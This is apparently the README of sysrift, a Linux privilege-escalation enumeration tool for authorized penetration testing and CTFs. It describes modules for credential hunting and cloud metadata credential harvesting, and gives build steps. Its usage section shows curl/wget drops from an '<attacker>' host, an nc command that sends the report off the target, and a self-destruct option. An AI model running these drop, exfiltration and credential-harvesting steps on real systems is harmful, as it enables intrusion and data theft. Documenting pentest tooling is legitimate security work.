sysrift
A Linux privilege escalation enumeration tool compiled to a single static binary. Ported from linPEAS and rewritten in Crystal for drop-and-run deployment with no runtime dependencies.
Why
linPEAS is the standard for Linux privesc enumeration, but it's a ~35,000 line Bash script that requires an interpreter, generates process noise, and buries findings in verbose output. sysrift addresses this:
- Single static binary -- drop in /dev/shm, run, delete. No interpreter, no dependencies.
- Selective execution -- run individual modules or combinations instead of a full sweep every time. Active checks (network connections, auth attempts) require explicit opt-in per execution via interactive prompt.
- Severity-tagged output -- `[!]` critical, `[+]` medium, `[-]` info, `[ok]` safe. Post-run summary surfaces only critical and medium findings.
- Smaller footprint -- one process, one log file. Self-destruct option removes the binary when done.
- Cross-architecture -- x86_64 and arm64 via static musl linking.
Modules
[A] = includes active checks (opt-in via interactive prompt). See ARCHITECTURE.md for design details, DETECTION.md for detection logic and CVE coverage.
| # | Module | What it checks |
|---|---|---|
| 1 | System Information | Identity, kernel version + CVE registry with distro backport detection, interesting groups, env vars, PATH and interpreter library path hijacking, mount flags, fstab credentials |
| 2 | SUID / SGID Binaries | GTFOBins cross-reference, writable binaries, SGID group context, shared library injection analysis, PATH hijack on non-standard SUIDs |
| 3 | Sudo Rights | sudo -l + sudoers enumeration, NOPASSWD/GTFOBins/env_keep, sudo CVEs, pivot target analysis, doas.conf, token reuse |
| 4 | Credential Hunting | Shell history, config files, secret-pattern scanning, shadow/passwd hashes, sshd config, PAM/LDAP, Kerberos tickets and keytabs, browser credential stores, password manager DBs, self-hosted app configs (Jenkins/Grafana/GitLab/Mattermost/Gitea/Cacti/Froxlor/ISPConfig/TeamCity/Duplicati/Portainer), database credential files, exposed .git in web roots, PHP sessions, wifi credentials, Terraform state, Docker/Kubernetes configs, GPG private keys, certificates and keystores |
| 5 | Writable Files & Dirs | Privileged system files (passwd/shadow/sudoers/ld.so.preload/binfmt_misc/ld.so.conf), profile.d, update-motd.d, logrotate abuse, ACL enumeration, world-writable directories |
| 6 | Network Information | Interfaces, routes, listening ports, /etc/hosts, ARP, forwarding, legacy r-commands trust, firewall rules |
| 7 | Processes, Cron & Timers [A] | Root processes with writable binaries, cron analysis (wildcards, writable targets, redirects), crontab-ui service detection, systemd timers, chroot detection, open FDs, /proc environ harvesting. Active: process sampling for hidden cron discovery |
| 8 | File Capabilities | Dangerous file capabilities, cap+binary combo detection, process capability enumeration via /proc |
| 9 | NFS Shares | /etc/exports no_root_squash, showmount, active NFS mounts |
| 10 | Container / Docker | Container detection (Docker/LXC/Kubernetes/Podman/containerd/CRI-O), runtime sockets, privileged mode, escape surfaces, namespace isolation, MAC profiles, runtime CVEs, host mount writability, user namespace mapping. Kubernetes: service account token, RBAC analysis, resource enumeration |
| 11 | Installed Software [A] | Compilers, transfer tools, web servers, internal service detection, Logstash config RCE surface, database services, vulnerable software CVEs with backport detection, AD membership, sshd_config, screen/tmux session hijacking. Active: database default credential testing |
| 12 | Users & Groups | Password policy, UID 0 backdoor users, shell users, groups, login history, readable home dirs, SSH keys |
| 13 | Services | Running/enabled services, writable systemd units and timers, systemd PATH hijack, writable init.d scripts |
| 14 | Interesting Files | Sensitive configs, backups, non-standard SUIDs, credential patterns in logs, recently modified files |
| 15 | Security Protections | AppArmor, SELinux, ASLR, kernel hardening sysctls, lockdown mode, grsecurity/PaX, loaded kernel modules, permissive /dev devices |
| 16 | D-Bus / PolicyKit | PolicyKit JS rules, writable pkexec/D-Bus binaries, config directory writability |
| 17 | Cloud Environment [A] | Cloud provider detection (AWS/GCP/Azure/DigitalOcean/IBM), CLI tools, credential files. Active: IMDS harvest for IAM credentials, tokens, user data |
Build
Requires Crystal 1.19+.
```bash
# Static x86_64 binary (recommended — no Docker required)
make x86_64-native

# Strip symbols (~30-40% size reduction)
make strip-native

# Native build (dynamic, for testing)
make local

# Static x86_64 binary via Docker (alternative)
make x86_64

# Static arm64 binary via Docker + QEMU
make arm64

# Syntax/type check only (no binary output)
make check
```
Prerequisites
| Target | Requires |
|---|---|
| `make x86_64-native` | Crystal + musl-gcc (`apt install musl-tools`) |
| `make local` | Crystal installed natively |
| `make x86_64` | Docker + `crystallang/crystal:latest-musl` |
| `make arm64` | Docker + QEMU binfmt (`sudo apt install qemu-user-static binfmt-support`) |
Output binaries are placed in dist/.
Usage
```bash
# Serve from attack box
python3 -m http.server 8080 -d dist/

# Drop to target (pick one)
curl http://<attacker>:8080/linaudit_x86_64_native -o /dev/shm/linaudit
wget http://<attacker>:8080/linaudit_x86_64_native -O /dev/shm/linaudit
scp dist/linaudit_x86_64_native user@target:/dev/shm/linaudit

# Run
chmod +x /dev/shm/linaudit && /dev/shm/linaudit
```
The interactive menu lets you:
- Run individual modules by number (e.g., `1` for System Information)
- Run multiple modules with comma separation (e.g., `1,3,5`)
- Run all modules with `0`
- List report files with `r`
- Self-destruct the binary with `x` (keeps report files)
Output is tee'd to a timestamped log file in /dev/shm/ with ANSI codes stripped:
```bash
# View report
less -R /dev/shm/audit-report_<user>_<timestamp>.txt

# Copy off target
nc <remote-ip> 4444 < /dev/shm/audit-report_<user>_<timestamp>.txt
```
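As an added example (not sysrift's own code), a small POSIX shell helper for triaging a saved report by the severity tags described above; it strips ANSI escapes first so it also works on a raw terminal capture, and the sample report it writes is constructed for illustration:

```shell
#!/bin/sh
# Added example, not part of sysrift: triage a saved report by the severity
# tags the tool emits ([!] critical, [+] medium, [-] info, [ok] safe). Handles
# a report captured with colour codes still in it (a raw terminal capture
# rather than the ANSI-stripped log) by stripping escapes first.
# The sample report written below is constructed for illustration.

esc=$(printf '\033')

# Remove CSI colour/cursor sequences so tags sit at column 1 again.
strip_ansi() { sed "s/${esc}\[[0-9;]*[A-Za-z]//g"; }

# Count lines that start with a given tag, e.g. count_tag report.txt '[!]'
count_tag() {
  strip_ansi < "$1" | awk -v tag="$2" 'index($0, tag) == 1 { n++ } END { print n + 0 }'
}

# Reproduce the post-run view: only critical and medium findings, in file order.
actionable_findings() {
  strip_ansi < "$1" | grep -E '^\[(!|\+)\] '
}

# True (exit 0) when the report holds at least one critical finding, so a
# scripted workflow can branch on it.
has_critical() { [ "$(count_tag "$1" '[!]')" -gt 0 ]; }

# Write a small constructed report to $1, ANSI-coloured as a raw capture would be.
write_sample_report() {
  printf '%s\n' \
    "sysrift audit (constructed sample)" \
    "${esc}[1;31m[!]${esc}[0m /etc/passwd is writable by the current user" \
    "${esc}[1;33m[+]${esc}[0m sudoers: NOPASSWD entry present for the current user" \
    "${esc}[0;36m[-]${esc}[0m kernel 5.15.0 (distro backports not detected)" \
    "${esc}[0;32m[ok]${esc}[0m ASLR enabled (kernel.randomize_va_space=2)" \
    "${esc}[1;31m[!]${esc}[0m /etc/exports: share exported with no_root_squash" \
    > "$1"
}

# Usage: write_sample_report /tmp/r.txt && actionable_findings /tmp/r.txt
```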
Status
Active work-in-progress (v0.4.0 — coverage-parity release; also in src/menu.cr banner and shard.yml). All 17 modules are functional. See ARCHITECTURE.md for design details and DETECTION.md for detection logic.
Known Limitations
- No 32-bit (i686) support. Crystal does not target 32-bit architectures. The binary fails with "Exec format error" on i686 systems -- a good example is HTB's retired Irked box (Debian 8, i686, kernel 3.16.0-6-686-pae). This is where interpreted tools like linPEAS win outright. Debian has dropped 32-bit ISOs and i686 is increasingly rare, but legacy infrastructure and older CTF boxes still run it.
- `make x86_64-native` currently links against glibc, not musl. The target name implies musl-static but the build command (`crystal build --static --link-flags "-static"`) uses the system `cc` toolchain. On a glibc-based dev host, the resulting binary is glibc-static and emits compile-time warnings for `dlopen`, `getaddrinfo`, and `gethostbyname` (pulled in by `mod_cloud`'s `http/client` for IMDS). At runtime the binary will demand the linker's glibc version on the target -- defeating the drop-and-run premise on systems with older glibc. Until this is fixed, ship the `make x86_64` (Docker `crystallang/crystal:latest-musl`) build, not `make x86_64-native`.
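As an added example (not part of sysrift), a pre-ship check for the glibc-static problem described in the second limitation: it scans a build output for the markers a truly self-contained musl-static binary should not carry. The string patterns are heuristics chosen here (an assumption), not a linker audit; `readelf -d` and `readelf -V` on the file give the authoritative answer.

```shell
#!/bin/sh
# Added example, not part of sysrift: flag a build that is dynamically linked
# or glibc-static before it is shipped. Uses only grep/sort/tr so it runs on a
# minimal host. The markers below are heuristics (assumption), not an ELF parse.
#
# Exit status: 0 clean, 1 findings reported, 2 file unreadable.
check_static_binary() {
  bin="$1"
  [ -r "$bin" ] || { echo "cannot read $bin" >&2; return 2; }
  findings=0

  # A program-interpreter path (PT_INTERP) is only present in dynamic binaries.
  if grep -a -q -E '/lib(64)?/ld-(linux|musl)[^ ]*\.so' "$bin"; then
    echo "[!] $bin: dynamic loader path present (not a static binary)"
    findings=$((findings + 1))
  fi

  # glibc's getaddrinfo/gethostbyname dlopen NSS modules at runtime even in a
  # static build; the "libnss_" prefix shows that code path was linked in.
  if grep -a -q 'libnss_' "$bin"; then
    echo "[!] $bin: NSS loader linked in (glibc-static; needs host glibc at runtime)"
    findings=$((findings + 1))
  fi

  # Symbol-version strings show which glibc the binary was linked against.
  versions=$(grep -a -o -E 'GLIBC_2\.[0-9]+' "$bin" | sort -u | tr '\n' ' ')
  if [ -n "$versions" ]; then
    echo "[+] $bin: glibc symbol versions referenced: $versions"
    findings=$((findings + 1))
  fi

  if [ "$findings" -eq 0 ]; then
    echo "[ok] $bin: no dynamic loader, NSS or glibc version markers found"
    return 0
  fi
  return 1
}

# Usage: check_static_binary dist/linaudit_x86_64_native
```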
Legal
This tool is intended for authorized penetration testing, security research, and CTF competitions. Unauthorized use against systems you do not own or have explicit written permission to test is illegal. The author assumes no liability for misuse.
Acknowledgements
sysrift is a port of linPEAS by Carlos Polop, part of the PEASS-ng project. sysrift does not replicate every linPEAS check -- it focuses on the highest-signal vectors post-foothold, structured for selective execution rather than full-sweep output.
GNU Lesser General Public License v3.0